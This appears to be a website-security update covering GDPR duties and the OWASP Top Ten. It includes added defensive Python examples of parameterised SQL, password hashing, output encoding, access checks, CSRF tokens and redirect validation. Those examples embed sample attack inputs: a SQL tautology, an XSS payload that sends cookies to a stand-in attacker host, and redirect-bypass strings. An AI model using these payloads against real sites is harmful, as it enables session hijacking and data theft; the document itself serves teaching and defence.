Security is a continuous concern for the owners of commercial websites. Such websites are public-facing, carry a professional reputation and often handle sensitive customer and user information. That is why we keep ahead of the latest changes to online security, the evolving methods of strengthening it and the ways of reducing vulnerabilities. This security update covers changes to EU data protection and hosting, the OWASP top ten web application vulnerabilities, and maintaining multiple levels of web security.
EU Data Protection Laws
From 25 May 2018 the EU General Data Protection Regulation (GDPR) applies, tightening the rules on how companies may handle personal data about users, staff and customers and requiring them to protect it from breaches or unapproved access. Failure to comply can be fined at up to EUR 20 million or 4% of the company's annual worldwide turnover, whichever is higher. Companies must notify the data protection authority of a data breach within 72 hours of becoming aware of it, and must also inform the affected individuals without undue delay where the breach is likely to put them at high risk. The criteria for consent to use someone's personal information are also tightened: consent must be freely given, specific, informed and unambiguous, and obtaining it in that form is obligatory.
This change in the law affects companies and individuals in the EEA (both EU member states and the non-EU countries that belong to the single market, such as Norway). It also reaches businesses outside the EEA that offer services to, or monitor, people inside it, but how that plays out depends on the local jurisdiction and the hosting company in question. A company in the EEA may hold personal data in any member state, as the same rules apply across the board. These changes will almost certainly affect the UK: we are expected still to be a member of the EU in May 2018, and the UK government intends to carry existing EU law over into UK law on Brexit, repealing only some of it afterwards.
OWASP Top Ten Web Application Vulnerabilities
OWASP (the Open Web Application Security Project) is an online community that collaboratively creates free tools, documentation and methods for improving web application security. Through discussion and debate it has established a broad consensus on the ten most critical categories of web application vulnerability, published as the OWASP Top Ten (the list below follows the 2013 edition), which every site owner needs to address:
Injection. This is a technique used to attack data-driven web apps: untrusted input (most commonly SQL, but also OS commands, LDAP or XML queries) is passed to an interpreter as part of a command or query, so that an attacker's input is executed as code rather than treated as data. This allows attackers to read or tamper with data, bypass authentication and act as administrators, and void or change transactions and balances. Ways of minimising the danger include using parameterised queries (prepared statements) or a safe ORM API rather than building queries by string concatenation, enforcing the type and length of input, validating input at every layer, and running the database account with the least privilege it needs.
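As an added example (not code from the original page), the following Python snippet puts a string-built query next to its parameterised equivalent, using the standard-library sqlite3 driver and a constructed two-row users table, and shows the classic tautology payload returning every row from the first and nothing from the second:

```python
"""Vulnerable vs parameterised SQL lookup.
Added example using the Python standard library; the users table and its
rows are constructed sample data."""
import sqlite3

# Constructed sample data: a minimal users table.
SAMPLE_USERS = [
    ("alice", "alice@example.com", "user"),
    ("bob", "bob@example.com", "admin"),
]


def make_db() -> sqlite3.Connection:
    """Create an in-memory database seeded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Builds the query by string formatting: the input becomes part of the
    SQL text, so a quote character in it changes the statement's structure."""
    query = f"SELECT name, email, role FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised query: the driver passes the value separately from the
    SQL text, so it is only ever compared as data, never parsed as SQL."""
    query = "SELECT name, email, role FROM users WHERE name = ?"
    return conn.execute(query, (name,)).fetchall()


def demo() -> tuple:
    """Run both lookups with a tautology payload and return the row counts."""
    conn = make_db()
    payload = "x' OR '1'='1"                       # WHERE name = 'x' OR '1'='1'
    leaked = find_user_vulnerable(conn, payload)   # every row comes back
    safe = find_user_safe(conn, payload)           # no user has that literal name
    return len(leaked), len(safe)


if __name__ == "__main__":
    print(demo())   # (2, 0)
```

The same principle applies to every interpreter the application talks to: pass untrusted values through the API's placeholder mechanism (or, for OS commands, an argument list rather than a shell string) instead of splicing them into the command text.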
Broken authentication and session management. Application functions for authentication and session management are frequently implemented incorrectly: passwords stored in plain text or with a fast unsalted hash, session identifiers that are guessable, exposed in URLs or not rotated after login, cookies without protective flags, and sessions that never time out. Attackers exploit these flaws to compromise passwords, keys or session tokens and so impersonate users. This can be avoided by following standard practice: store passwords only as salted, deliberately slow hashes, generate session identifiers from a cryptographically secure random source, set the Secure, HttpOnly and SameSite flags on session cookies, rotate the session on login and invalidate it on logout, and validate the session on every request rather than only on the login page.
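To make those three practices concrete, here is an added example (standard library only, not code from the original page) that hashes passwords with a per-user salt and PBKDF2, verifies them in constant time, generates a session identifier from the OS random source, and builds the Set-Cookie header with the protective flags. The iteration count and the cookie name are assumptions for illustration.

```python
"""Salted password hashing, session-id generation and a hardened session
cookie. Added example using only the Python standard library."""
import hashlib
import hmac
import os
import secrets

# Assumption: a work factor that costs a fraction of a second per login on
# current hardware; raise it as hardware gets faster.
PBKDF2_ROUNDS = 600_000


def hash_password(password: str) -> str:
    """Return 'pbkdf2_sha256$rounds$salt_hex$hash_hex'.
    A fresh random salt per user defeats precomputed (rainbow) tables; the
    high iteration count slows offline guessing if the database leaks."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2_sha256${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and rounds and compare in constant
    time, so the comparison itself leaks nothing about where the digests
    differ. Malformed records simply fail verification."""
    try:
        algo, rounds, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                        bytes.fromhex(salt_hex), int(rounds))
        return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))
    except ValueError:
        return False


def new_session_id() -> str:
    """256 bits from the OS CSPRNG: unguessable, unlike identifiers built
    from timestamps, counters or user names."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id: str, max_age: int = 1800) -> str:
    """Build the Set-Cookie header value for the session cookie.
    Secure: never sent over plain HTTP. HttpOnly: invisible to page
    scripts, so an XSS cannot read it. SameSite=Lax: not attached to
    cross-site POSTs, which also blunts CSRF. The __Host- prefix makes the
    browser insist on Secure, Path=/ and no Domain attribute, so a
    subdomain cannot overwrite the cookie. Max-Age gives an idle timeout."""
    return (f"__Host-session={session_id}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Lax")
```

On login the server would call `hash_password` once at registration, `verify_password` against the stored record, then issue a brand-new `new_session_id()` (never reuse the pre-login one) and send it with `session_cookie_header`.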
Cross site scripting (XSS). The application takes untrusted data and sends it to a browser without proper escaping, so an attacker's script is injected into an otherwise benign and trusted page and runs in the victim's browser with that page's privileges. This can lead to hijacked sessions and stolen credentials, defaced pages, and users being redirected to malicious or misleading sites. The main defence is to encode all untrusted data for the context in which it is rendered (HTML body, attribute, JavaScript, URL) at output time, every time; input validation and sanitisation help, and a Content Security Policy limits the damage when an encoding is missed.
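The following added example (not from the original page; the comment-rendering and profile-link functions are hypothetical) shows a reflected XSS in a template that interpolates raw input, next to the same output with context-aware encoding: HTML-attribute encoding for the attribute, HTML encoding for the text node, and URL encoding plus HTML encoding for a link built from user input.

```python
"""Reflected XSS: raw interpolation vs context-aware output encoding.
Added example, standard library only; the page fragments are hypothetical
and the attacker inputs are constructed."""
import html
from urllib.parse import quote

# Constructed attacker inputs as they might arrive in form fields.
SCRIPT_PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_comment_vulnerable(author: str, body: str) -> str:
    """Interpolates raw input into HTML: the browser parses the script tag
    and the injected event handler as markup."""
    return f'<div class="comment" data-author="{author}"><p>{body}</p></div>'


def render_comment_safe(author: str, body: str) -> str:
    """Encode each value for the context it lands in. html.escape with
    quote=True converts & < > " and ', so the same call is safe for both
    the double-quoted attribute and the text node."""
    return (f'<div class="comment" data-author="{html.escape(author, quote=True)}">'
            f'<p>{html.escape(body, quote=True)}</p></div>')


def profile_link_safe(username: str) -> str:
    """URL context: percent-encode the path segment (safe='' also encodes
    '/'), then HTML-encode the finished attribute value and the link text."""
    href = "/users/" + quote(username, safe="")
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(username)}</a>'


def contains_active_markup(rendered: str) -> bool:
    """Crude check for the demo: does a raw script tag or an attribute
    break-out survive into the rendered output?"""
    lowered = rendered.lower()
    return "<script" in lowered or '" onmouseover=' in lowered


if __name__ == "__main__":
    print(contains_active_markup(render_comment_vulnerable(ATTR_PAYLOAD, SCRIPT_PAYLOAD)))  # True
    print(contains_active_markup(render_comment_safe(ATTR_PAYLOAD, SCRIPT_PAYLOAD)))        # False
```

Note that encoding is per context: `html.escape` alone would not make input safe inside a `<script>` block or an `href="javascript:..."`, which is why templating engines offer distinct escaping filters for each.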
Insecure direct object references. When an application exposes a reference to an internal object, such as a file path, database key or account number, in a URL or form parameter without checking that the current user is allowed to reach it, an attacker can simply change the value to read other users' data. Protections are to perform an access control check every time a direct object reference is used, and where possible to use indirect references (for example per-session handles that the server maps back to the real identifier) rather than exposing the internal key at all.
Security misconfiguration. Insecure default settings, unpatched software, unused features left enabled, verbose error messages and open directory listings or storage can all give unintended access to data or functions. Misconfiguration can occur at any layer: the platform, web server, application server, database, framework or custom code. The best remedy is a repeatable, automated and testable hardening process applied identically to development, staging and production, backed by regular updating and patching and by periodic scans and audits.
Sensitive data exposure. Improper protection of sensitive data, such as payment details, credentials or customer records, puts it at risk either where it is stored (the database and its backups) or as it travels between browser, server and back-end systems. Beyond enabling fraud, a leak is a PR nightmare for the company. To protect sensitive data, identify what you hold and discard what you do not need, encrypt it at rest with strong algorithms and properly managed keys, encrypt it in transit with TLS on every connection (not just the login page) and enforce this with HSTS, and store passwords only as salted, slow hashes rather than encrypted values.
Missing function level access control. Here the application hides links or buttons for privileged functions in the UI but does not re-check authorisation on the server when the function is actually requested, so anyone who knows or guesses the URL can invoke it. The result is unauthorised access to data and functions. Protect against this by enforcing access control on the server for every function, ideally through a single centralised check that denies by default; hiding controls on the client side is a usability measure, not a security one.
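The two access-control items above (insecure direct object references and missing function level access control) are the object-level and function-level halves of the same problem, so one added example covers both. It is not code from the original page; the session, document store and handlers are hypothetical stand-ins for a real web framework. It enforces an ownership check on a direct reference, issues per-session indirect handles so the real key never reaches the client, and wraps a privileged function in a server-side role check that runs whether or not the UI showed the link.

```python
"""Object-level and function-level authorisation enforced on the server.
Added example; Session, DOCUMENTS and the handlers are constructed stand-ins
for a web framework's request context, data layer and route handlers."""
from dataclasses import dataclass, field
from functools import wraps
import secrets


class Forbidden(Exception):
    """Raised whenever a check fails; a framework would turn it into 403."""


@dataclass
class Session:
    user_id: int
    role: str
    # Indirect references: opaque per-session handle -> real document id.
    handles: dict = field(default_factory=dict)


# Constructed sample data: document id -> (owner user id, contents).
DOCUMENTS = {
    101: (1, "alice's invoice"),
    102: (2, "bob's invoice"),
}


def require_role(role: str):
    """Function-level check, applied as a decorator on the handler itself,
    so it cannot be skipped by calling the URL directly."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(session: Session, *args, **kwargs):
            if session.role != role:
                raise Forbidden(f"{fn.__name__} requires role {role}")
            return fn(session, *args, **kwargs)
        return wrapper
    return decorator


def get_document_direct(session: Session, doc_id: int) -> str:
    """Direct reference with the ownership check that IDOR-prone code omits.
    Admins may read anything; everyone else only their own documents. A
    missing id and a foreign id give the same error, so an attacker cannot
    enumerate which ids exist."""
    owner, body = DOCUMENTS.get(doc_id, (None, None))
    if owner is None or (owner != session.user_id and session.role != "admin"):
        raise Forbidden("not your document")
    return body


def issue_handle(session: Session, doc_id: int) -> str:
    """Indirect reference: give the client an unguessable handle that only
    this session can resolve. The caller must already be allowed to read
    the document, so a handle can never widen access."""
    get_document_direct(session, doc_id)
    handle = secrets.token_urlsafe(16)
    session.handles[handle] = doc_id
    return handle


def get_document_by_handle(session: Session, handle: str) -> str:
    """Resolve the handle in this session only, then re-run the direct check."""
    doc_id = session.handles.get(handle)
    if doc_id is None:
        raise Forbidden("unknown handle")
    return get_document_direct(session, doc_id)


@require_role("admin")
def delete_user(session: Session, user_id: int) -> str:
    """Privileged function: the decorator runs before this body."""
    return f"user {user_id} deleted by {session.user_id}"


def allowed(action, *args) -> bool:
    """Demo helper: True if the action succeeds, False if it is refused."""
    try:
        action(*args)
        return True
    except Forbidden:
        return False
```

In a real application the `require_role` decorator (or an equivalent middleware) would be applied to every route, with the default being to deny, so that a forgotten annotation fails closed rather than open.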
Cross site request forgery (CSRF). A logged-in user's browser is tricked, for example by a hidden auto-submitting form on an attacker's page, into sending a forged HTTP request to your site; the browser attaches the victim's session cookie automatically, so a site that does not perform proper request validation cannot tell the forged request from a legitimate one. Including an unpredictable, session-bound CSRF token in every state-changing request and verifying it on the server, combined with the SameSite cookie attribute and never changing state on GET, protects your users from forgeries.
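As an added example (not code from the original page), the following derives a per-session CSRF token from a server-side secret, checks it on every state-changing request whether it arrives in a hidden form field or a request header, and lets safe methods through untouched. The request dictionary is a constructed stand-in for a framework request object, and the secret would in practice be loaded from configuration.

```python
"""Session-bound CSRF token: generation, embedding and verification.
Added example, standard library only; the request dict is a constructed
stand-in for a web framework's request object."""
import hashlib
import hmac
import secrets
from typing import Optional

# Assumption: a server-side secret loaded from configuration, never sent to
# clients. Generated here so the example runs stand-alone.
SERVER_SECRET = secrets.token_bytes(32)
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


def csrf_token(session_id: str) -> str:
    """Token = HMAC(secret, session id). Unpredictable without the secret and
    bound to this session, so a token captured from another session is
    useless, and nothing needs to be stored server-side."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def token_valid(session_id: str, presented: Optional[str]) -> bool:
    """Recompute and compare in constant time."""
    if not presented:
        return False
    return hmac.compare_digest(csrf_token(session_id), presented)


def check_request(request: dict) -> bool:
    """Gate for every state-changing request. request is
    {'method': str, 'cookies': dict, 'form': dict, 'headers': dict}.
    The token may come from a hidden form field or, for fetch/XHR calls,
    from an X-CSRF-Token header."""
    if request["method"] in SAFE_METHODS:
        return True                      # safe methods must never change state
    session_id = request["cookies"].get("session")
    if session_id is None:
        return False                     # no session, nothing to forge against
    presented = (request["form"].get("csrf_token")
                 or request["headers"].get("X-CSRF-Token"))
    return token_valid(session_id, presented)


def hidden_field(session_id: str) -> str:
    """What the server embeds in its own forms."""
    return f'<input type="hidden" name="csrf_token" value="{csrf_token(session_id)}">'
```

An attacker's page can make the victim's browser send the cookie, but it cannot read the token out of your form (same-origin policy) nor compute it (no secret), so the forged POST fails the check. The token does not help if the site also has an XSS, since injected script can read the form; that is one more reason the XSS defences above matter.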
Using components with known vulnerabilities. Libraries, frameworks and other software modules run with the same privileges as the application, so a known flaw in one of them, often exploitable with readily available tools, can bypass all of your own security measures. Keep an inventory of every component and its version, including transitive dependencies, follow the security announcements for each, check the inventory against vulnerability databases (automated dependency-checking tools such as OWASP Dependency-Check do this), upgrade promptly, and remove components you do not actually use.
Unvalidated redirects and forwards. Web applications frequently redirect users to another page using a destination taken from a request parameter. If that parameter is not validated, an attacker can craft a link on your trusted domain that sends victims to a phishing or malware site, or forward them to an internal page they should not be able to reach. Avoid redirect parameters where possible; where you need them, do not accept a full URL from the user: allow only a relative path on your own site or an index into an allowlist of known destinations, and validate the value on the server immediately before redirecting.
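The validation is easy to get subtly wrong, because browsers accept several spellings of "go to another host". The added example below (not code from the original page; the allowed host list is an assumption) checks a `next`-style parameter and falls back to the home page for anything that is not a same-site destination, covering protocol-relative, backslash, userinfo and scheme-based bypasses, and goes beyond the text by normalising absolute URLs to your own host onto https.

```python
"""Validating a redirect target against an allowlist.
Added example, standard library only; ALLOWED_HOSTS is an assumed list of
this site's own hostnames."""
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.example.com"}   # assumption: this site's own hostnames
DEFAULT_TARGET = "/"


def safe_redirect_target(target: str, allowed_hosts=ALLOWED_HOSTS) -> str:
    """Return target if it is a same-site destination, else DEFAULT_TARGET.
    Rejects protocol-relative '//evil', backslash variants '/\\evil'
    (browsers treat \\ as /), foreign schemes such as javascript:, absolute
    URLs to other hosts, and 'https://own-host@evil' userinfo tricks."""
    if not target:
        return DEFAULT_TARGET
    # Browsers normalise backslashes to slashes; do the same before parsing
    # so the parser sees what the browser will see.
    normalised = target.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return DEFAULT_TARGET              # javascript:, data:, vbscript: ...
    if parts.netloc:
        # Absolute or protocol-relative URL: only our own hosts. hostname
        # strips any user:pass@ prefix and lower-cases, so the userinfo
        # trick resolves to the real (foreign) host and is rejected.
        if (parts.hostname or "") not in allowed_hosts:
            return DEFAULT_TARGET
        # Re-emit on https so a redirect never downgrades the connection.
        return urlunsplit(("https", parts.netloc, parts.path or "/", parts.query, ""))
    # Relative URL: require exactly one leading slash so it stays on this
    # origin ('//' would be protocol-relative, no slash could be anything).
    if not normalised.startswith("/") or normalised.startswith("//"):
        return DEFAULT_TARGET
    # Drop the fragment and any CR/LF that could split the Location header.
    cleaned = normalised.split("#", 1)[0].replace("\r", "").replace("\n", "")
    return cleaned or DEFAULT_TARGET


if __name__ == "__main__":
    for candidate in ("/account", "//evil.example/", "/\\evil.example",
                      "https://www.example.com@evil.example/", "javascript:alert(1)"):
        print(repr(candidate), "->", safe_redirect_target(candidate))
```

The safest variant is stricter still: store the allowed destinations server-side and let the parameter be only a short key into that table, so no URL parsing of user input is needed at all.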